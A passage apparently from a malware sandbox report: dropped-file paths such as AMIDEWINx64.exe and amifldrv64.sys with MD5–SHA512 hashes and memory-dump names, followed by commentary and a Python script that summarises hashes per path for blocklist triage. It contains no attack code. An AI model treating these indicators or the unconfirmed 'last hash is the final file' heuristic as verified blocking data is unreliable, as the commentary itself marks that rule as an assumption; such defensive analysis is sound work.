memory/2760-137-0x000000001B430000-0x000000001B440000-memory.dmp

memory/2440-138-0x000000001C0C0000-0x000000001C172000-memory.dmp

memory/1948-141-0x0000000005EE0000-0x0000000005EFE000-memory.dmp

memory/2440-142-0x000000001B050000-0x000000001B060000-memory.dmp

memory/1948-143-0x0000000006320000-0x000000000636C000-memory.dmp

memory/2760-145-0x000000001C0C0000-0x000000001C1C0000-memory.dmp

memory/2760-146-0x000000001C0C0000-0x000000001C1C0000-memory.dmp

memory/2760-147-0x00007FFC31770000-0x00007FFC3182E000-memory.dmp

memory/2760-149-0x000000001C0C0000-0x000000001C1C0000-memory.dmp

memory/2760-148-0x000000001C0C0000-0x000000001C1C0000-memory.dmp

memory/2760-150-0x000000001C0C0000-0x000000001C1C0000-memory.dmp

memory/2760-144-0x000000001B430000-0x000000001B440000-memory.dmp

memory/1948-140-0x00000000049A0000-0x00000000049B0000-memory.dmp

memory/2760-139-0x000000001B430000-0x000000001B440000-memory.dmp

C:\ProgramData\Microsoft\Windows\Disk.bat

MD5 250e75ba9aac6e2e9349bdebc5ef104e
SHA1 7efdaef5ec1752e7e29d8cc4641615d14ac1855f
SHA256 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516
SHA512 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 f19dfda7c503ae1da1d6f1fb529c2103
SHA1 f6b4f39c919a2449adba8de78f12e828f0138338
SHA256 30103e7a6bbb95cd7b3ea01fc21f0dc9dc257d79fd0875172098133cc27660d6
SHA512 4f4d24cfe8576f31c19495214d73c288115ac627de35636ec6adee1873d351aeefd27eed949f693420063d368b8e2e6dea6cf2415543a99746a14b8ccee1e495

C:\ProgramData\Microsoft\Windows\DevManView.cfg

MD5 43b37d0f48bad1537a4de59ffda50ffe
SHA1 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8
SHA256 fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288
SHA512 cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 dfca42ee6f895b7df4af4504341c0533
SHA1 d69e15a9b79ffc7303835f1fdf86f4e28f6dd672
SHA256 726b29485d1191eee284f0597b91bb12f3747e3804a57d369843ff6409c3e448
SHA512 99c94504ed43a0a453930a8a2f47c2d64c7ba331ba20efafeb7d8c6fcc6cec1912ed16bf2687b4e8c8e7b148a9d14a9a2359f91c79359dda1c071216429af1b0

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 33d7a84f8ef67fd005f37142232ae97e
SHA1 1f560717d8038221c9b161716affb7cd6b14056e
SHA256 a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b
SHA512 c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 61b3314f618f9b2ff7c980812db60b2f
SHA1 4888ad71adb70de61f5e66ff69bb8b9bada86a24
SHA256 622b77e7be477db18201edb06748c51cd352808c55e2e8ee11c25543fd850080
SHA512 727525fa299a6296e5b747a73b00e779edf1d1782304faae7a3546f9fb43a8a6185a66a8b3db9f3a6d2a2a86d31a47edba0adef9235c4408363cebda2b8c0023

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 e339fa3973003369a65a61f64a95c8bd
SHA1 b2f438625ef5f4d85bbed11f6a03bd79ba4463f5
SHA256 d6ccb70db5621c870a16dbd890150ae9457f3dc496ed5e08c987cf42d82312de
SHA512 38ba8b24ae911f453c1e0622cf39db5be364c2a3a33f4174f6c35fdd1248e6610b3c5fcbd6f241d6cbd2abbfea9172d5aa05c06633c5a83fd3775d6cd8b1e2c2

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 0523d050a48d86b9bfe304c6d90365e8
SHA1 4f902fa9d6d39b601db1384720bdd0b1dbf0ddc1
SHA256 009ddb762ea345a42d97be1cc1df61d9439b896108ff3afbea2305330576ca6e
SHA512 fba7bf47985c096342a1118925ae354cac5a2072b4968e6c31d1e49c8d05ba06b8f27cbe6010875dbb30131242840e42504446531c22b777a50539016e2595e7

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 a6719935b387b7d67dc0712d680c36ac
SHA1 c47b46d3efd0800db4e800ad6a36047eb053384d
SHA256 64222e99cb59b50cba614bc2d517d89685b0bb7262d64e3877f684f11f89bae2
SHA512 13191de577170d15e7b6ad07907b2ee1ba5cdce3b928e7a7c73d6277aae4fdf5f158c18e85a8b65ae9b6e962b2df60a765e9ee6ff30ccf79e800cfe46001761a

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 e07effacda15b4f6ddb676fba175ac1b
SHA1 8aaebf0c13936f925a6b4b8146a6e881e0d21c7a
SHA256 07cbe174fb8ff539966659d6841dbab276f4201194acfb451684f8d7552836a1
SHA512 128e2f2bb1d354ab1f1face637e17bc2554b8cf1375b9a985d25ed2cac4dd452c55324e174efdd79ceccdd40d5915677c3ade943c991061c4a84d68e7ab9cbd5

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 a9454f9230cd7f4081320431f6ec9c41
SHA1 d242b920ba66e4ae212c68bfcd2dd77d37064ce3
SHA256 ab634e2bd4cf7b65eddcffed1f27a2d364e439574bdad234f437591b1b3d2b93
SHA512 30e117f8f740a297129ff054b0ec21df7f7724acd700d0ee4ff5ac31a1b130b967c46b4288807d1a362fba71f1ed167a00adc64cba5c0d8cbbf44cd2a7180ddd

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 eb74f8eeb66a9b199738fd9d419e921e
SHA1 9be9529423048a1e8a6a89e78866ee52747820ba
SHA256 bfe07003354e3e0df83181621ac54a55cb18ebe6c981b2eff6c2ded90490ed6c
SHA512 fb41deaf707905f76ed742a880f541120fabb8aa7dcc6278a436fe03ea944914d7dbf34dfbe3a8740fc068f350dfb328f9efff8e4fed8093101c42f6b4947d06

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 42eaccd5a8ebf910a562ebf717cd9276
SHA1 648b95da9651faf19564d84ed0129fc887182e26
SHA256 2d982a98b3e31458a202cb03906c50d0156a234ad0b0993a234ca40af1cdf4a6
SHA512 8afa5adc9c707b026b1c4ead6e43a9dd089e1a9c157edf8aa908e1703d5ac7282c5ed481dc6c0cae3d29d385eb726964824fe0f57e13b193d7924d26099c5b2c

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 b56b5412fdaadff3be860aa69d9a7733
SHA1 6d77549744ec8e433cc6facb658cd5cdd55c9b2f
SHA256 ebf6de7338e6170162bec99b2fb5e69093ae01bce9644b29df3edc6ada072e74
SHA512 410dcefb54648015125a0bfb5e39ae53e7c2b9d875d304474cc7a3d32245f2551895fdab6cb5eceeca9d3239707ff6d16495421d56db5fa9c8e6e115f6f55e6f

memory/2760-170-0x000000001B430000-0x000000001B440000-memory.dmp

memory/3968-180-0x0000019FE2A90000-0x0000019FE2AB2000-memory.dmp

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 cc216032c8aa72241b2479f9262c1980
SHA1 4cc66d591de42147a336fe001a09759935a059eb
SHA256 e3dd6be55a7d17ce27fa001a531984b29524cc6914d0d2d0b3df63c6396e0223
SHA512 d4446ff981ffed8e91c4084939693be628a7e0a1d8b7f6f2181ddbe662dba1e22308c3dee1198a9f40033f605fa59e9481534e1fbf22e3d69d32b64509a8baa8

C:\ProgramData\Microsoft\Windows\amifldrv64.sys

MD5 785045f8b25cd2e937ddc6b09debe01a
SHA1 029c678674f482ababe8bbfdb93152392457109d
SHA256 37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba
SHA512 40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 b35db115e3483fde6452da70eb8452c8
SHA1 f7eb27ea059531af9797d1e3515d543b4c9a387b
SHA256 db33f5a9664a179534628c463866a8b34ff9e1b63dfbc9e12731400c9547b7cb
SHA512 4043718e16e60bf4333fcff8bb954224467f98e57ca9dc62ef840043b8185f7262ef9b8c4e276f94fb11ae7af9b016af37c8fa8c26e6de1ef34d6af332c7b4b1

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 f523ef3f1ba2a6625a526f355b50a508
SHA1 b07cc30507b088ebc127335be13c4b2a6edb87a4
SHA256 088b78fe62398f46e938dc81ff0988469099747eaf08bc51cc0d4d24a252a598
SHA512 32043009da7238b8fcb7805700a50655fe3c4325566f86b4170f392f5ba01db19de666b91424e0b20cd7c522499d2f0fa3099465cf0d3f1441501b27a7155f25

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 c35c92e0a5bd63423b8f0f744c16f20d
SHA1 87e84992667791c40d2ce662f2798b09b782f4d3
SHA256 dc2ede873fe6347cc0bfe33f4a817b687338909d5a91665c88d1552c7efa9687
SHA512 7b00f0e2c857cffd06f6312f5f152086d1171f31944d808c1d107b3adbbfa89e9362df52b6ad1b3f7f0cafbf9334a40306e590ab442289a1dddb7a2334ce9c2e

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 a0c04f8e7a963e792cf10f7d73a51cfd
SHA1 9917e01586f2b267849ac1840ae02f3f7d643168
SHA256 2fda778cc884b300504d73b7e78f434d82d2d5428f9f2b982d4baa0608333593
SHA512 180490f2eda6d5b5ce1e967f2768d9da94665eaf0894d1dcabbd351cf82085773e2ef00a4dcdc916b9aedd6224e7c3368c39dd3ce2c38e8bd8f4c433f68264cd

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 ef860327a66f4fe77c6ad597fa203d36
SHA1 289576995de9bafe4bda09a7290abff14ad55ba9
SHA256 4c4182d2184cd1ecc4b56ba1f874e69386b8188ed4c9e68b2aa7e36adea53328
SHA512 65d4983b39db11ba75b32c9c0b1d216c6653b2692d0e36de774c4a8d1e91014bfbea59f08437ffbbbbbbbd3dbe8c670e7255a7c4466589e3d6ec5b55169ee08f

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 21e090a737dd2cc00f6ef2ba466b43d4
SHA1 59085e756c72feb83f364f0b8c21f6e29086a6b1
SHA256 290a35ab388877ab38eb2ed200a238ce38c845e084cfea38d7b3508bed0711d2
SHA512 38626564eaafcee63997938e82d9a1764f375290d28ecbe9bfe70d5e06950315cc9c075c46ffba8cb38b896b7bc0ba5d0b3315e76bd3783a458d1b4cb66180fc

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 0070dea2377d6f53c754997868966a64
SHA1 5a4afedddeeaeff4dac4f791fb0239c369954069
SHA256 ffea5d956ea4c28129b3631e932b6439a9c5721e0ffc1b0b36baa2ede4dd3787
SHA512 60c38c70001c7c8b00a0a5f49b19408245fd39c4762dec6952dc7d98a91bf9f1b6cc09c737e6147cad216d166f4006dfe064658e69cfa75103d1936ca1244eee

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 b1746cc3f3717e7709f772269d3367af
SHA1 6efff1b380d5a28a9cdc79b0ddee87450fad8ecb
SHA256 8c76a84d929b87c9042666eb2051353d098a52b0ac153908b6d685411029e6ec
SHA512 efdb4386e812a25bf29a6d9c64b046e7f7b6a8e70d39f2a0bb9e43150bd738b920da64b4353ad76d2485b59ee662eff592d744dba896e872055106db97f11ca7

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 47b843a590dfc95949bcf0f6e7565eab
SHA1 c85128cb338867478dfce3a1dd8b6c4f539b2783
SHA256 3c9efd1ea53342ef2a1d16e7a7510ab0e92875b65dbe389e719fc742c006fe2f
SHA512 de5bcfa7a7d4666f31cdb6c7e6059995c692fc0c4ad9f82d04776442417b6527a8dcc47b05b5b6962b65f808d1234591c413e0a3ed8b6080e786627fa2f66817

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 5a5fc403b2d0cb5c3ff45c03579a543c
SHA1 0066574800ddaa070c82d107f1fcefe79d131fc0
SHA256 1ac6c2fa0c090c811ffbde47f1f6710d45a049d26febe446a5857ec0ff707bcd
SHA512 7950a4aab34e7ab7f5bc2c0e4937e53fbe55dfbaf7f290baa866b3d626c56ff7a3502d02ac8721b0b453197f5d0572b8617fa856cac9908eb0f611c71c057083

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 bb3690041e9c5b98d94e720a2ac6f569
SHA1 a89375a1fe40adc108c5ad7a3a78db29c00cc2d8
SHA256 a0f59dea38d4629f2bd12b044dbeb1a49df588e26ae5ca1f1bb1d5e207d3a580
SHA512 84e95170d8be046fbfc32aa6226c6bb98f9b5a025bb759b67871d2218de6a5b74ed7d4d926a8a023a1b5cecd3cd7d75b8fda736df5823add67d007fb93a0fec7

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 f964ff7a999f3798cc227196d6654d6c
SHA1 3d6c6b7ace1844057ac996967a279e1fcfaacd2c
SHA256 3f3e2a62f29aa043362220db7cd4a42f9fe28dd0bd6f4424d51f71d24c151b0e
SHA512 3ff43158db288f27a873d263dafde337df53872c50034bb2347a7b418c202d022443cf318cbdb6968b611768be8a22f615a5e0679dc4f3e9b5caae3a34234b2d

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 2b64cb6b803820740cdad1c99b97e4bd
SHA1 66a1b03d258a9b42a76cddcba31559107215fc8c
SHA256 c21ceb346cbabaf3a6c5fcd1783904c890ea1ecf7fcc94ae3ba41b90291bf71a
SHA512 b825a1cf003359bdf81ab7afd79ea78bf373d204a2492c11227a69d5d6d718d7afe73f26beac7e4b68aa9902525400015d3999d30ba95f8b29876de400a19c68

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 ae85bbb30233d8aafab254a7d54e6720
SHA1 7def98d6ae17350332cb06725f3b64cf705aa98b
SHA256 e9f45c68a850a3fbf4b691fc5926811e7f8342af8d712fff09bc9bb80cee9b3c
SHA512 62c39f6ae2da9479bada027beae55f0103207be233ad3bd54b46056221b6cae6a09c2dc5fa77b13e3dfbd237017280212a2b47b0e62a6435136a37a6e2777544

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 e4f7b0f5b4e75f97843e001cfdfa49f9
SHA1 e16f03c5b7c100b43446791595697823b63e6518
SHA256 7a3217c0e475331fe842d040c819f37a299756bff474db5425108ebc48a1fc71
SHA512 961c55f3cc20d6719b34c931c4872ff809d504ec766a120c2dd995da2e5aacefcc5aee5781be5af5fd43b5d343d5b1fdddb736433904b66fe7eec2e99ba110e6

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 3a1967c887226322f1c249e908ec18dd
SHA1 419a6a646186ddd88c5f724b464d5dd81ef4bc75
SHA256 f9350428df91b736dd965a3084d01bec05e2f3c084f4a39890b15bab37663c5c
SHA512 232fff07351e5fe4d225980a26a7d3cfb0a43f8d1144d887c3e9b694da7e75027c912cd7ebdae34a430d68b4495505e34517400c8f841da790fcc69d7cad943e

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 440b5b55068f2dfcfd2c3bd0dff114b4
SHA1 0fd00af7aa7709ba5954fd9102e9b37323bc575c
SHA256 9db72a1385fc6e2ae2e4868d7034e5d9d59173a3988eae648d08e2dabf7f1588
SHA512 d2431aec55d978b35a59808a5a40cfdec3de1b14c0ec5573b50b2869ea1278ce4d5985b2c0061b405f77ba9ded512877ebcec4efded601fe4005cf875f670d65

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 aa67e5b6c44aa5bd38774f608e8f48ce
SHA1 d0d822803a7be363b56d601d016ffbbe2eee127e
SHA256 1ff4c9627e308c8340a28cec66e9c050dd6f104382d530cb037b09656ed2670d
SHA512 3d5c773a930042e60d5a56ed317aeb31e558092735f5924247d953e045c8643a91c57ee5e3bfefced170de98c62717324bf478e90e972558fd7c16179891d134

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 c4d09d3b3516550ad2ded3b09e28c10c
SHA1 7a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA256 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA512 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 29be5db653313ca26fc71fd29a9c87be
SHA1 8e94e68e9ee653801022d9b6e390a9a4d9421044
SHA256 a23ca34daf17f745e1e84bf09378868d19d82d22e3eb118596ab3ceca3c118df
SHA512 15aa7fb3bd9216495101f8656be48d8a2797106809a6c51de401ca1f8fe133caeca4c761d4db637bba1a359ab793e20f91cf33b0b5bc9b2e4baa2e1788a1bc93

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 adcab2dc127c140ca478234768c2fc05
SHA1 2845c0ca3d0778f74a8b43dcf58a9eef71080c03
SHA256 ab875d94bb5895891b41430e6b96698e00dad1897b2403f1295d5185c13994ab
SHA512 1daf20c9ec43f83241ca004f3cabdf2c8ce889b9bc8276f68718eda337e6e719472a30b505ca27415aa299c8fbf654be3fc0319815be7f9733a6d77f7ea07846

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 75c39430eb6b002fbbbb624060196545
SHA1 2200486859babd1f54604815b1a76f3522860eec
SHA256 6fad1b2807cd28dbfe9c1f2f65852f556a5bcecaae22b91e39b22e8b19aa4884
SHA512 fa5de7de93984ae7d223dc52d7bf95fbd5e35b266289e196540c459e00c03aa3df5e9ad5b7172163269a0eda562962c8b62697a9ac3cd6eea3c1f803f89c1bee

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 340200850de98f311bb4634553b2cf93
SHA1 44afa4f2c13e01a296c7fd3a8fc532b31a95b29d
SHA256 f3877fcb8211a032929de62bce555f443024aecc35d3db0f449169ff6768c868
SHA512 6e48d42219e5e744d1ec57395dcb86ad7e3b8a581552f223e4d869df0c35352a562aa1e8021a57cca20960b05f03f3e38e837b935bd246e4a7a4c6e24fe439a0

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 e77632d2b67f00e8244aed09432661bd
SHA1 aacf985a45e44ba92f3ebe204a3a0e3fc0436be4
SHA256 ae1b5b4e2f182b2d6978c87e5f71fb572aa235a3246220f74b8c9855fd95e864
SHA512 a5d0f61a01e088efbbe2b11ba0192a8584990cf016df4aab887070a02620f64a5907a0cd5a7408b0bbc8e38ae072074dce32c7aeab65639969f98a518aa500a7

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 fc353f2e1c1e2cc084e98df010e320b3
SHA1 b4660f49bb5ce94bdf8fb6340bfe7c82149bb4ff
SHA256 22f6ab4e41f7479308993930873a3150f0bed88fe7ec983653f967f9f3147d7d
SHA512 8470703feaea08f841e68ceb19426e23a0461ba12f63527c5b827d6976525e3277a6858ca6223d35e5dc5bc859f22608b90420df9a59d980a5acb79bd6b2c3c9

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 79d4f5cfc7ab132bc6c5e4770d76ea38
SHA1 e29002453abc0bdf1566e985e3c52ae7469aa56a
SHA256 da5c6add93975ddcea4fe495670b9939f72e42f063da1d0f5d34614cfb2b541e
SHA512 c76ebb824a2a4c31090139e95102693b29d421aea5a48c39f04930267795c1801d9a9740ccb630d5fdf42a877e82a3fc0de347ff8ef2f5d3ebe2ce2f297b4185

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 944f318d87acba3debc921958d57fac5
SHA1 f20fa39eee769102198e633e404feefbdc33d8ce
SHA256 079d36524f458c0ee6178834fefabc471e183024d8a6ec758b1027b0ebcb0187
SHA512 fe242ef03e00677c5bcec1c1f8e5f4dfbcba075bc8f2859e2ea3a7e062f63708562f401fd1b3dad57e18a4bd6926c4389b10b5e2f2a8626ea2b60ff04a0d3665

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 2eab29acb6c820edf699e3bb8042ec82
SHA1 61359d4e372ad21deb5c32f9270e2cec1d767915
SHA256 bd20847ccb1ccf79b6c5d7f444fb208d212e5f3ff7a6bf45d9f6e6e2d60d261f
SHA512 7b9f0652d34ab09fb9d36c0e293db1683a9cb37cb86c87ee509828f9ba65b1be6e4cab756c4c5606af1ff0a80a9c3b8ed62fc5f64ec20d844fd3f3b09c71a155

memory/3412-307-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-309-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-305-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-306-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-304-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3412-303-0x0000000140000000-0x000000014000E000-memory.dmp
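Two things in the Files listing above need care before any of it is turned into blocklist material. First, the same dropped path appears many times with different hashes (AMIDEWINx64.exe alone is listed with more than twenty distinct digests); in sandbox listings of this kind that usually means the file was hashed at successive writes while it was still being unpacked, so only the last hash recorded for a path is a plausible final-file indicator and the earlier ones should not be pushed to blocking controls. Second, the memory/PID-N-START-END entries are process memory dumps, and a region starting at 0x140000000 (PID 3412) sits at the default image base of a 64-bit MSVC-built executable, which is where an unpacked payload is worth carving from. The script below is an added example, not part of the report: the listing it parses is an excerpt copied from the section above (SHA512 lines omitted for brevity), and the "last hash per path is the final file" rule is an assumption to confirm against the sandbox's own file events.

```python
"""Summarise a sandbox 'Files' listing: writes per dropped path, last SHA256,
and dumped memory regions per PID. Added example; excerpt copied from the report."""
import re
from collections import OrderedDict, defaultdict

FILES_EXCERPT = r"""
memory/4368-0-0x0000000074E70000-0x0000000075421000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 16fe4a11d4e2fa589fb75fa74390ab76
SHA1 6971282ae6d78967b67d75eccdf9110797f7640b
SHA256 88651fde7e9bbe60fbc6684d60831d0cce118383d06b5b224454b555e9de4e45

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

MD5 4949aea9e9235198da71c92eb2b0a16a
SHA1 92f173f525217806b2b4d6b2cd84a3ca9337b105
SHA256 a38dd7f9620f9dd86a65cb0bd50631faff5c33bd68fdd95e1c4d195d55aa5058

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 cc216032c8aa72241b2479f9262c1980
SHA1 4cc66d591de42147a336fe001a09759935a059eb
SHA256 e3dd6be55a7d17ce27fa001a531984b29524cc6914d0d2d0b3df63c6396e0223

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 2eab29acb6c820edf699e3bb8042ec82
SHA1 61359d4e372ad21deb5c32f9270e2cec1d767915
SHA256 bd20847ccb1ccf79b6c5d7f444fb208d212e5f3ff7a6bf45d9f6e6e2d60d261f

memory/3412-303-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3412-304-0x0000000140000000-0x000000014000E000-memory.dmp
"""

HASH_ALGOS = ("MD5", "SHA1", "SHA256", "SHA512")
DUMP_RX = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
X64_DEFAULT_IMAGE_BASE = 0x140000000   # MSVC default for 64-bit EXEs


def parse_files(text):
    """Return (writes, dumps): writes maps path -> list of {algo: digest} in
    listing order; dumps is a list of (pid, seq, start, end)."""
    writes, dumps, current = OrderedDict(), [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = DUMP_RX.match(line)
        if m:
            pid, seq, start, end = m.groups()
            dumps.append((int(pid), int(seq), int(start, 16), int(end, 16)))
            current = None
            continue
        algo, _, digest = line.partition(" ")
        if algo in HASH_ALGOS and current is not None:
            current[algo] = digest.lower()
            continue
        current = {}                     # a new path line starts a new record
        writes.setdefault(line, []).append(current)
    return writes, dumps


def final_hashes(writes):
    """path -> (recorded writes, distinct SHA256 values, last SHA256 seen)."""
    return {path: (len(recs),
                   len({r["SHA256"] for r in recs if "SHA256" in r}),
                   next((r["SHA256"] for r in reversed(recs) if "SHA256" in r), None))
            for path, recs in writes.items()}


def dump_regions(dumps):
    """pid -> sorted unique (start, size, starts_at_default_x64_image_base)."""
    regions = defaultdict(set)
    for pid, _, start, end in dumps:
        regions[pid].add((start, end - start, start == X64_DEFAULT_IMAGE_BASE))
    return {pid: sorted(v) for pid, v in regions.items()}


if __name__ == "__main__":
    writes, dumps = parse_files(FILES_EXCERPT)
    for path, (n, distinct, last) in final_hashes(writes).items():
        print(f"{n:2d} writes, {distinct} distinct SHA256, last {last}  {path}")
    for pid, regions in dump_regions(dumps).items():
        for start, size, is_base in regions:
            print(f"PID {pid}: 0x{start:X} size 0x{size:X}{'  (x64 image base)' if is_base else ''}")
```

Feeding the full Files section in place of the excerpt gives the per-path write counts directly; the paths with a single recorded hash (Disk.bat, DevManView.cfg, amifldrv64.sys) are the ones whose digests can be used as-is.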